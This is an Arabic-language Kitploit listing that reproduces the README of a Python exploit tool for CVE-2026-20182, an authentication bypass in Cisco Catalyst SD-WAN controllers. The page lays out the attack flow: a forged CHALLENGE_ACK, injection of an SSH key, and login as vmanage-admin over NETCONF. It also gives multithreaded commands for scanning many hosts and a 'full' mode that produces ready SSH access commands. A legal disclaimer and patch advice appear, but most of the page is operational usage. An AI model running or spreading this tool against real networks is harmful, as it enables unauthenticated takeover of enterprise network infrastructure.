Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20182 — تجاوز مصادقة Peering في Cisco Catalyst SD-WAN | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-20182
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2026-20182

CVE-2026-20182

تجاوز مصادقة Peering في Cisco Catalyst SD-WAN

عرض المستودع
12منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20182

تجاوز مصادقة الاقتران في Cisco Catalyst SD-WAN

CVE-2026-20182 — تجاوز مصادقة الاقتران في Cisco Catalyst SD-WAN

أداة تقييم للاختبار المصرح به لتجاوز مصادقة الاقتران في Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
الخطورةحرجة (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
المنتجCisco Catalyst SD-WAN Controller (المعروف سابقًا بـ vSmart) · Cisco Catalyst SD-WAN Manager (المعروف سابقًا بـ vManage)
المشكلةآلية مصادقة الاقتران لا يتم تطبيقها بشكل صحيح
السكربتCVE-2026-20182.py

ملخص الثغرة

نشرة مايو 2026: وجود خلل في مصافحة اتصال التحكم / مصادقة الاقتران يسمح لـمهاجم عن بُعد غير مصادَق بتجاوز المصادقة والحصول على وصول داخلي بصلاحيات عالية على الأنظمة المتأثرة.

يرسل المهاجم طلبات مخصصة إلى النظام المتأثر. عند النجاح، قد يتمكن المهاجم من المصادقة كحساب داخلي بصلاحيات عالية وغير جذر والوصول إلى NETCONF، مما يتيح التلاعب بإعدادات بنية SD-WAN.

التوصية: طبّق إصلاحات Cisco الأمنية وفقًا لتوجيهات البائع الرسمية. قيّد التعرض لمستوى الإدارة، وراقب اتصالات مستوى التحكم، ودقّق في وحدات تحكم SD-WAN بحثًا عن تغييرات إعدادات غير مصرح بها.


التواصل

تيليجرام: @KNxploited


معاينة الكونسول

كونسول عمليات CVE-2026-20182


الأداة: CVE-2026-20182.py

إطار عمل استغلال بلغة Python 3 لـCVE-2026-20182 ضد vdaemon الخاص بـ Cisco SD-WAN (UDP/DTLS 12346).

ماذا تفعل الأداة (خطوة بخطوة)

الاحتياطي للبنية: عند حدوث TEAR_DOWN أو عدم تطابق المعاملات، يعيد المحاولة باستخدام الإعدادات المسبقة البديلة domain/site (1,100) و(1,1) و(0,0) ما لم يتم استخدام --no-fallback.


مستويات النتائج (اقرأ بعناية)

مهم

  • وضع check → المستوى 03 كحد أقصى (فحص تجاوز). ليس دليل استغلال كامل.
  • وضع full → استهدف المستوى 01 (ssh_verified).
  • https://host في القائمة → تلميح ويب TCP فقط (80/443). ليس UDP DTLS على 443.

المتطلبات

root@kitploit:~
pip install -r requirements.txt

OpenSSL (النظام)

ويندوز

  1. ثبّت Win64 OpenSSL 3.x أو ما يعادله
  2. أضف bin\ إلى PATH، أو عيّن:
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

لينكس

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

تخرج الأداة عند بدء التشغيل إذا تعذر تحميل OpenSSL.


بدء سريع

القائمة التفاعلية (الافتراضي)

root@kitploit:~
python CVE-2026-20182.py
  • اضبط الخيارات 1–11، ثم 0 = تشغيل الفحص
  • وضع التشغيل الافتراضي: check (فحص تجاوز آمن)

غير تفاعلي (أتمتة)

root@kitploit:~
python CVE-2026-20182.py -y

أوضاع التشغيل

CHECK — فحص تجاوز فقط

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — حقن مفتاح + التحقق من SSH (الأهداف المصرح بها فقط)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

مرجع سطر الأوامر (كل خيار + مثال)

الأهداف وخيوط العمل

-f / --file — قائمة الأهداف (الافتراضي: targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — عدد خيوط العمل (1–200، الافتراضي 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID الافتراضي عندما لا يكون موجودًا في القائمة (الافتراضي: 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID الافتراضي عندما لا يكون موجودًا في القائمة (الافتراضي: 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

الوضع والأتمتة

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — تخطي القائمة التفاعلية؛ استخدام قيم سطر الأوامر فقط

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

التحقق من SSH

--no-ssh-verify — تخطي اختبار SSH بعد الحقن (غير موصى به في وضع full)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — محاولة استخدام TCP 22 أيضًا بعد 830

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / البنية

--no-try-list-udp — UDP 12346 فقط؛ تجاهل :port من القائمة

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — مختبر: منافذ UDP إضافية على كل مضيف

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — تعطيل إعادة المحاولة domain/site عند TEAR_DOWN

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

التسجيل

-v / --verbose — تسجيل كل رسالة بروتوكول TX/RX

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

القائمة التفاعلية (عند حذف -y)


تنسيق targets.txt

هدف واحد لكل سطر. الأسطر التي تبدأ بـ # يتم تجاهلها.

ملف مثال

root@kitploit:~
# Lab controllers — authorized only
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

غير مدعوم: IPv6 (IPv4 / اسم المضيف فقط).


ملفات الإخراج

مثال لأمر SSH (المستوى 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

سير العمل الموصى به

1) فحص العديد من المضيفين (سريع)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

راجع cisco_sdwan_03_bypass_only.jsonl والإحصاءات المباشرة Bypass only.

2) تأكيد الاستغلال على المضيفين المدرجين في القائمة المختصرة

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

راجع cisco_sdwan_01_confirmed_ssh.jsonl — الملف الوحيد الذي يحتوي على ssh_verified: true.

3) تصحيح أخطاء مضيف واحد (مفصّل)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

الإحصاءات الحية (أثناء الفحص)


ملاحظات تشغيلية

  • الوضع الافتراضي هو check — لا يكتب مفاتيح ولا يثبت SSH بمفرده.
  • النجاح الحقيقي = ssh_verified=true في وضع full فقط.
  • مصحّح / بنية خاطئة → غالبًا TEAR_DOWN بعد CHALLENGE_ACK؛ فعّل التراجع الاحتياطي للبنية أو صحّح domain/site في القائمة.
  • يجب أن يسمح جدار الحماية بـUDP/12346 (وأي منافذ UDP إضافية في القائمة) من الماسح الضوئي إلى وحدة التحكم.
  • لا ترفع sdwan_keys/ أو نتائج الفحص إلى مستودعات عامة.

إخلاء مسؤولية قانوني

هذا البرنامج مخصص لـالبحث الأمني المصرح به والتقييم الدفاعي والتعليم فقط.

يجب أن يكون لديك إذن كتابي صريح لاختبار أي نظام لا تملكه أو تشغّله. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. المؤلف غير مسؤول عن إساءة الاستخدام أو الأضرار أو العواقب القانونية الناشئة عن استخدام هذه الأداة.

استخدم الأداة فقط على الأنظمة والشبكات التي لديك تفويض صريح بإجراء اختبارات أمنية عليها.


بواسطة: Nxploited ( Khaled Alenazi )

تنزيل الأداة
العنصرالتفاصيل
متجه الهجومالشبكة
الصلاحيات المطلوبةلا شيء
تفاعل المستخدملا شيء
النطاقمتغير
الأثرالسرية والسلامة والتوافر — عالٍ
الخطوةالمرحلةالوصف
1تحميل الأهدافتحليل targets.txt ودمج التكرارات حسب (host, domain_id, site_id)
2فحص OpenSSL المسبقتحميل المكتبات المشتركة OpenSSL 3.x/4.x لـ DTLS المخصص
3اتصال DTLSالاتصال بمنفذ UDP الهدف (دائمًا 12346 أولاً، ثم منافذ القائمة الاختيارية)
4CHALLENGEاستقبال CHALLENGE من الخادم (0x08)
5CHALLENGE_ACKإرسال CHALLENGE_ACK مخصص كـvHub (type 2) — تجاوز المصادقة
6Helloإكمال تبادل Hello — يؤكد مسار التجاوز
7aوضع CHECKالتوقف هنا — تسجيل bypass / Hello OK فقط (بدون مفاتيح، بدون SSH)
7bوضع FULLحقن مفتاح SSH العام عبر VMANAGE_TO_PEER
8ACK الحقنتوقع REGISTER_TO_VMANAGE (0x0D) كإقرار بروتوكول
9التحقق من SSHاختبار تسجيل الدخول باسم vmanage-admin عبر TCP 830 (NETCONF)، واختياريًا 22
10الإخراجفرز النتائج في ملفات متدرجة + قائمة أوامر قابلة للقراءة البشرية
المستوىالملفالمعنى
01 — SSH مؤكدcisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — المستوى الوحيد الذي يُعتبر دليل اختراق كامل
02 — حقن ACK فقطcisco_sdwan_02_inject_ack_only.jsonlالبروتوكول قبل حقن المفتاح؛ فشل تسجيل دخول SSH
03 — تجاوز فقطcisco_sdwan_03_bypass_only.jsonlHello/تجاوز ناجح؛ لا يوجد حقن مؤكد
المتطلبملاحظات
Python3.9+
pipcryptography, rich
OpenSSLمكتبات مشتركة 3.x أو 4.x (libssl + libcrypto) — إلزامي
الوضعالعلامةحقن SSHالتحقق من SSHاستخدم عندما
CHECK--mode check (الافتراضي)لالافحص واسع النطاق، اكتشاف التجاوز
FULL--mode fullنعمنعم (ما لم يتم استخدام --no-ssh-verify)إثبات الاختراق
#الخيار
1ملف الأهداف
2خيوط العمل
3DOMAIN_ID الافتراضي
4SITE_ID الافتراضي
5الوضع: check / full
6إعادة المحاولة التلقائية للبنية عند TEAR_DOWN
7سجل البروتوكول المفصل
8التحقق من SSH بعد الحقن
9التحقق أيضًا من SSH :22
10محاولة استخدام منافذ UDP المحددة في القائمة
11منافذ UDP إضافية (مختبر)
12عرض مساعدة تنسيق القائمة
0▶ تشغيل الفحص
التنسيقمثالالسلوك
عنوان IP / اسم المضيف10.0.0.1UDP 12346 + القيم الافتراضية domain/site
عنوان IP + منفذ UDP10.0.0.2:12346محاولة استخدام منفذ UDP من القائمة أيضًا
عنوان IP + منفذ + domain + site10.0.0.3:12346:1:100مجموعة بنية كاملة
رابط HTTPShttps://10.0.0.4المضيف + تلميح TCP 443 فقط (ليس UDP/443)
رابط HTTPhttp://10.0.0.5تلميح TCP 80 فقط
رابط UDPudp://10.0.0.6:12346UDP صريح
مفصول بعلامة تبويب/فاصلة10.0.0.7 12346 1 100نفس صيغة الحقول الأربعة
مفتاح=قيمة10.0.0.8;port=12346;domain=1;site=100صيغة مفتاح/قيمة بفاصلة منقوطة
الملفالمحتوى
cisco_sdwan_results.jsonlنتيجة JSON خام لكل محاولة
cisco_sdwan_success.txtأسطر SSH المؤكدة (مفصولة بعلامات تبويب)
cisco_sdwan_01_confirmed_ssh.jsonlالمستوى 01 — SSH مؤكد
cisco_sdwan_02_inject_ack_only.jsonlالمستوى 02 — حقن ACK، فشل SSH
cisco_sdwan_03_bypass_only.jsonlالمستوى 03 — تجاوز / Hello فقط
cisco_sdwan_commands.txtأوامر SSH قابلة للقراءة البشرية
cisco_sdwan_findings.jsonملخص الجلسة + الأعداد
sdwan_keys/مفاتيح خاصة مولّدة (وضع full)
العدادالمعنى
التقدمالأهداف المكتملة / الإجمالي
SSH مؤكدعدد المستوى 01
حقن ACKعدد المستوى 02
تجاوز فقطعدد المستوى 03
فشلأخطاء / لا يوجد تجاوز